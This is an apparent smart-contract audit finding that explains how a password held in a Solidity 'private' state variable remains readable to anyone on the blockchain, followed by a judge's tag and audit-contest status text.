Insecure Password Storage
Summary
The private state variable (string private s_password) is suffers from a fundamental vulnerability related to the visibility of data stored on the blockchain.
Vulnerability Details
The core vulnerability in this contract is rooted in the transparency of blockchain data. It's important to note that everything inside a smart contract is visible to all external observers of the blockchain.
While the use of the private keyword in Solidity restricts access to data within other contracts, it does not hide the data from external parties.
This means that, even when s_password state variable is marked as private, it will still be visible to the whole world outside of the blockchain.
Impact
The string private s_password variable can be accessed by anyone.
Tools Used
Manual Review
Recommendations
To address the vulnerability and improve security, we recommend implementing strong data encryption techniques to safeguard sensitive information. Encrypt the password (string private s_password) data before storing it on the blockchain, ensuring that even if exposed, it remains secure and cannot be easily decrypted.
Lead Judging Commences
finding-anyone-can-read-storage
Private functions and state variables are only visible for the contract they are defined in and not in derived contracts. In this case private doesn't mean secret/confidential
Rewards breakdown
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.